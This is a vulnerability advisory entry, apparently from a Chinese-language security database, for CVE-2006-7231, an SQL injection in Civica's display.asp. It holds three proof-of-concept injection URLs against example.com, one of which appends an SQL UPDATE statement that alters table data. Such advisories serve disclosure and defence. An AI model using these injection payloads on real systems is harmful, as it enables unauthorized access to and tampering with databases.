https://www.exploit-db.com/exploits/28762
https://www.securityfocus.com/bid/82057
Civica - 'Display.asp' SQL Injection






漏洞ID | 1111196 | 漏洞类型 | Input Validation Error |
发布时间 | 2006-10-05 | 更新时间 | 2006-12-31 |
![]() |
CVE-2006-7231 | ![]() |
N/A |
漏洞平台 | ASP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
|漏洞EXP
source: http://www.securityfocus.com/bid/20354/info
Civica is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/civica/press/display.asp?layout=1&Entry=1,2,3,4,5,......
http://www.example.com/civica/press/display.asp?layout=1&Entry=1 having 1=1
http://www.example.com/civica/press/display.asp?layout=1&Entry=1,2,3,4,5,,,,,+upd
ate+prtReleases+set+isplayStyle='text';--
|受影响的产品
Civica Software Civica 0
|参考资料
resource:Exploit
hyperlink:http://www.securityfocus.com/bid/20354
resource:
hyperlink:https://exchange.xforce.ibmcloud.com/vulnerabilities/40305
hyperlink:http://www.securityfocus.com/bid/20354
resource:
hyperlink:https://exchange.xforce.ibmcloud.com/vulnerabilities/40305
检索漏洞
开始时间
结束时间